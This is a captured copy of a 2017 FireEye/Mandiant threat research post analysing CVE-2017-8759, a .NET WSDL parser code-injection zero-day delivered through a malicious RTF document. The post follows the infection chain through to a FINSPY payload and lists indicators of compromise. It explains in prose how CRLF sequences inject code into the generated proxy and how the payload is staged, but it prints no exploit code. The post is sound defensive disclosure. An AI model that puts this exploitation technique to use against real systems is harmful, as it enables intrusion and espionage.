www.mandiant.com Open in urlscan Pro
2606:4700:300b::a29f:f07d  Public Scan

Form analysis
1 forms found in the DOM

GET /search

<form action="/search" method="get">
  <div class="js-form-item form-item js-form-type-textfield form-item-search js-form-item-search">
    <label class="visually-hidden" for="edit-search">Search</label>
    <input data-drupal-selector="edit-search" type="text" id="edit-search" name="search" value="" size="30" maxlength="128" class="form-text" placeholder="Search">
  </div>
  <div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" id="edit-actions">
    <button data-drupal-selector="edit-submit-acquia-search" type="submit" id="edit-submit-acquia-search" class="button js-form-submit form-submit">
      <span class="visually-hidden">Submit search form</span>
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 453.7 453.76">
        <defs>
          <clipPath id="prefix__a">
            <path fill="none" d="M0 0h453.7v453.76H0z"></path>
          </clipPath>
        </defs>
        <g clip-path="url(#prefix__a)">
          <path fill="currentColor"
            d="M453.7 416.28L311.81 274.39c49.35-67.5 43.77-162.94-17.15-223.88-67.3-67.35-176.89-67.35-244.19 0s-67.29 176.89 0 244.22a172.45 172.45 0 00223.86 17.15l141.88 141.88zM88 257.25a119.67 119.67 0 11169.23 0 119.87 119.87 0 01-169.23 0">
          </path>
        </g>
      </svg> </button>
  </div>
</form>

Text Content

Skip to main content
 * Advantage Platform
   
   
   MANDIANT ADVANTAGE PLATFORM
   
   PLATFORM OVERVIEW
   
   Automated Defense
   
   Automatically investigate security alerts to reduce false positives.
   
   Security Validation
   
   Validate that security controls are working as expected.
   
   Threat Intelligence
   
   Take decisive action with industry leading threat intelligence.
   
   Attack Surface Management
   
   Fully map your entire environment to mitigate risks.
   
   Managed Defense
   
   Defend your enterprise with managed detection and response.
   
   Close
 * Services
   
   
   MANDIANT SERVICES
   
   ALL SERVICES
   
   Incident Response
   
   Tackle breaches confidently.
   
   Strategic Readiness
   
   Increase resilience to risk.
   
   Technical Assurance
   
   Battle-test how well your security program performs.
   
   Cyber Defense Transformation
   
   Establish and properly orchestrate cyber defenses.
   
   Mandiant Academy
   
   Train your security team to effectively protect your enterprise.
   
   Close
 * Resources
   
   
   RESOURCES
   
   ALL RESOURCES
   
   Customer Stories
   
   See case studies and customer testimonials.
   
   Mandiant Blog
   
   Read expert perspectives and industry news.
   
   Webinars
   
   Expand your cyber security knowledge base.
   
   Podcasts
   
   Listen to our State of the Hack, Eye on Security and Cyber Security
   Effectiveness podcasts.
   
   Reports
   
   Threat Intelligence from front line experts.
   
   Insights
   
   Explore the latest views on key threats, trends and predictions.
   
   Close
 * Company
   
   
   COMPANY
   
   ABOUT MANDIANT
   
   Leadership
   
   Investor Relations
   
   Media Center
   
   Events
   
   Careers
   
   Close


Search
Submit search form
Incident response !
Close
 * Advantage Platform
   * Back
   * Advantage Platform Landing
   * Security Validation
   * Attack Surface Management
   * Managed Defense
 * Services
   * Back
   * Services Landing
   * Incident Response
   * Strategic Readiness
   * Technical Assurance
   * Cyber Defense Transformation
   * Mandiant Academy
 * Resources
   * Back
   * Resources Landing
   * Customer Stories
   * Mandiant Blogs
   * Webinars
   * Podcasts
   * Reports
   * Insights
 * Company
   * Back
   * About Mandiant
   * Leadership
   * Investor Relations
   * Media Center
   * Events
   * Careers


TOP

 * Advantage Login
 * Incident Response Assistance
 * Support

Incident response !


BREADCRUMB

 1. Home
 2. Resources
 3. FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute
    FINSPY

Threat Research


FIREEYE UNCOVERS CVE-2017-8759: ZERO-DAY USED IN THE WILD TO DISTRIBUTE FINSPY

Genwei Jiang, Ben Read, James T. Bennett
Sep 12, 2017
4 mins read
Zero Day Threats

FireEye recently detected a malicious Microsoft Office RTF document that
leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This
vulnerability allows a malicious actor to inject arbitrary code during the
parsing of SOAP WSDL definition contents. Mandiant analyzed a Microsoft Word
document where attackers used the arbitrary code injection to download and
execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been
coordinating public disclosure timed with the release of a patch to address the
vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

VULNERABILITY USED TO TARGET RUSSIAN SPEAKERS

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c),
might have been used to target a Russian speaker. Upon successful exploitation
of CVE-2017-8759, the document downloads multiple components (details follow),
and eventually launches a FINSPY payload (MD5:
a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for
purchase as part of a “lawful intercept” capability. Based on this and previous
use of FINSPY, we assess with moderate confidence that this malicious document
was used by a nation-state to target a Russian-speaking entity for cyber
espionage purposes. Additional detections by FireEye’s Dynamic Threat
Intelligence system indicates that related activity, though potentially for a
different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL PARSER CODE INJECTION

A code injection vulnerability exists in the WSDL parser module within the
PrintClientProxy method (http://referencesource.microsoft.com/ -
System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl does not
perform correct validation if provided data that contains a CRLF sequence. This
allows an attacker to inject and execute arbitrary code. A portion of the
vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code
inserts the “//base.ConfigureProxy(this.GetType(),” string after the first
address, commenting out the remaining addresses. However, if a CRLF sequence is
in the additional addresses, the code following the CRLF will not be commented
out. Figure 2 shows that due to lack validation of CRLF, a
System.Diagnostics.Process.Start method call is injected. The generated code
will be compiled by csc.exe of .NET framework, and loaded by the Office
executables as a DLL.

Figure 2: SOAP definition VS Generated code

THE IN-THE-WILD ATTACKS

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF)
document, similar to the CVE-2017-0199 documents we previously reported on. The
malicious sampled contained an embedded SOAP monikers to facilitate exploitation
(Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an
attacker-controlled server. The WSDL parser, implemented in
System.Runtime.Remoting.ni.dll of .NET framework, parses the content and
generates a .cs source code at the working directory. The csc.exe of .NET
framework then compiles the generated source code into a library, namely
http[url path].dll. Microsoft Office then loads the library, completing the
exploitation stage.  Figure 4 shows an example library loaded as a result of
exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and
leverages mshta.exe to retrieve a HTA script named “word.db” from the same
server. The HTA script removes the source code, compiled DLL and the PDB files
from disk and then downloads and executes the FINSPY malware named “left.jpg,”
which in spite of the .jpg extension and “image/jpeg” content-type, is actually
an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6
random numbers ].exe. Figure 6 shows the process create chain under Process
Monitor.

Figure 6: Process Created Chain

THE MALWARE

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY.
It leverages heavily obfuscated code that employs a built-in virtual machine –
among other anti-analysis techniques – to make reversing more difficult. As
likely another unique anti-analysis technique, it parses its own full path and
searches for the string representation of its own MD5 hash. Many resources, such
as analysis tools and sandboxes, rename files/samples to their MD5 hash in order
to ensure unique filenames. This variant runs with a mutex of
"WininetStartupMutex0".

CONCLUSION

CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY
uncovered by FireEye in 2017. These exposures demonstrate the significant
resources available to “lawful intercept” companies and their customers.
Furthermore, FINSPY has been sold to multiple clients, suggesting the
vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was being used by additional actors. While we
have not found evidence of this, the zero day being used to distribute FINSPY in
April 2017, CVE-2017-0199 was simultaneously being used by a financially
motivated actor. If the actors behind FINSPY obtained this vulnerability from
the same source used previously, it is possible that source sold it to
additional actors.

ACKNOWLEDGEMENT

Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE
Team and FireEye iSIGHT Intelligence for their contributions to this blog. We
also thank everyone from the Microsoft Security Response Center (MSRC) who
worked with us on this issue.





RELATED THOUGHT LEADERSHIP

Report


IDC MARKETSCAPE: WORLDWIDE INCIDENT READINESS SERVICES 2021 REPORT

 |  2 mins read Blog


ROAD TO SECURITY PREDICTIONS 2022 WITH SANDRA JOYCE, MANDIANT'S EVP, GLOBAL
INTEL & ADVANCED PRACTICES

10.26.2021 Oct 26, 2021  |  2 mins read Blog


FLARE-ON 8 CHALLENGE SOLUTIONS

10.22.2021 Oct 22, 2021  |  2 mins read
your cybersecurity advantage


FOOTER

 * Customers
   * Support
   * Community
 * Partners
   * Mandiant Partners
   * Service Partners
   * Cyber Risk Partners
   * Technology Partners
   * Partner Portal
 * Company
   * About Mandiant
   * Media Center
   * Careers
 * Products and Services
   * Advantage Platform
   * Managed Defense
   * Mandiant Services
   * Mandiant Academy
 * Connect with Mandiant
   * Contact Us
   * Report an Incident
   * Email Preferences

Follow Mandiant
 * 
 * 
 * 
 * 


SOCIAL MENU

© Copyright 2021 Mandiant. All rights reserved.


BOTTOM

 * Privacy & Cookies Policy
 * Terms & Conditions
 * Compliance
 * Site Map

WIR SCHÄTZEN IHRE PRIVATSPHÄRE SEHR
Diese Website nutzt Cookies und verwandte Technologien gemäß der Beschreibung in
unserer Datenschutzrichtlinie zu Zwecken, zu denen unter anderem der Betrieb der
Website, Analyse, verbessertes Nutzererlebnis und Werbung zählen. Sie können
unserer Nutzung dieser Technologien zustimmen oder Ihre eigenen Präferenzen
verwalten.
AUSWAHL VERWALTEN ZUSTIMMEN UND FORTFAHREN ALLE ABLEHNEN
Datenschutzerklärung
Powered by:
Cookie-Präferenzen